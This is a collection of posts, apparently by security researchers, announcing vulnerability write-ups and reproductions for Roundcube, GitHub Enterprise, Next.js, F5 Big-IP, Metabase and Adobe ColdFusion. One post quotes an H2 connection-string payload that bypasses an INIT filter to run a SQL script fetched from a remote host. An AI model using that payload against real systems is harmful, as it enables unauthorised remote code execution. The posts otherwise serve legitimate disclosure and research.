My research on CVE-2025-49113 is out. https://t.co/kuLczCSv6V. Happy reading! #CVE #roundcube #poc @FearsOff

CVE-2025-49113 is a fascinating PHP Object injection in Roundcube webmail, a really nice find by the original finder. #roundcube #cve-2025-49113 #rce

New from us! Testing a Rails + Nginx app? This should be in your checklist. Read the blog to know how we disclosed Discourse database backups!

I just published a new blog post sharing an improved Deserialization Gadget Chain for Ruby! It builds on the work of others, including Leonardo Giovanni, Peter Stöckli @GHSecurityLab and @wcbowling https://t.co/mzXQnA691O

Check out our latest blog post! We dive into GitHub Enterprise’s SAML implementation and explore an authentication bypass in encrypted assertion mode. CVE-2024-4985 / CVE-2024-9487: GitHub Enterprise SAML Authentication Bypass. https://t.co/mFOE6GGkhO

Checkout our new blogpost! In this post we talk about SAML and the recent Ruby-SAML Auth bypass. CVE-2024-45409: Ruby-SAML Auth Bypass in GitLab https://t.co/VYZ3YG0oXD

My colleague @hash_kitten and I discovered a full-read SSRF vulnerability in Next.js (CVE-2024-34351). We published our research today on @assetnote's blog: https://t.co/pUXGG64B0O. Thank you to the Vercel team for a smooth disclosure process.

Check out my write-up on a seemingly harmless and limited send() in GitHub (CVE-2024-0200) and how it could be used to obtain environment variables from a production container and to achieve remote code execution in GitHub Enterprise Server: https://t.co/jmjTTOxEGY

Enjoy our next blog post this time an SQL Injection on Apple’s Infra. Another win nets us a $25,000 bounty! 💻💰 #AppleSecurity #Research #bugbountytips #bugbounty https://t.co/p09IH8bE86

Check out our new blog post! We hacked into Apple Travel Portal (yes, again!) using a 0-day Remote Code Execution exploit. Part 1 is live now, stay tuned for the follow-up on another RCE worth a total bounty of $40k! https://t.co/az4wNhDYyO

As the PoC is almost out, we are now publishing our analysis.

Hello OgnlGuard/isSafeExpression, we meet again 🤝 🥲 Confluence OGNL Injection.

Reproduced the CVE-2023-46747 F5 Big-IP RCE via AJP smuggling. Props to @praetorianlabs for identifying this cool bug. @pdnuclei template dropping soon. Time to sleep😴 #f5-rce #CVE-2023-46747

Reproduced the AJP request Smuggling to access /tmui/* resources directly. Very interesting bug indeed, need to further look into post-exploitation. Until next time😴

HTTP Request Splitting vulnerabilities exploitation https://t.co/6cvM7XD9FY

Here is the #exploit that targets the "VMWare Aria Operations for Networks" which has CVSS 9.8 and targets all the versions from 6.0 to 6.10 (CVE-2023-34039) 🔥 I just wrote the exploit, but the discovery credit is for @rootxharsh and @iamnoooob 👏 https://t.co/iyuICAJShC

Plenty of ways to RCE, another way to bypass the INIT key block for the h2 engine is using an escape character: mem:;\INIT=RUNSCRIPT FROM 'htttp://rce/poc.sql'//\; Great find!

The Metabase pre-auth RCE is interesting. While the entry point is straightforward, the process of exploitation is fun. We suspect we might have exploited this in an unintended way. We'll wait for @assetnote's blog, based on that we may or may not publish our analysis.

⚠ Multiple RCEs, CVEs, and Confusions. Discover the roller coaster ride of vulnerabilities, patch bypasses, and uncover the story behind the temporary take down of our blog! Read now - https://t.co/4kHdz83lOc #AdobeColdFusion #CVE-2023-29300 #CVE-2023-38203 #CVE-2023-38204

New blogpost! In this post we analyse CVE-2023-29300, a pre-auth RCE in Adobe ColdFusion via unsafe Java Reflection invocation. https://t.co/6av1adAYRP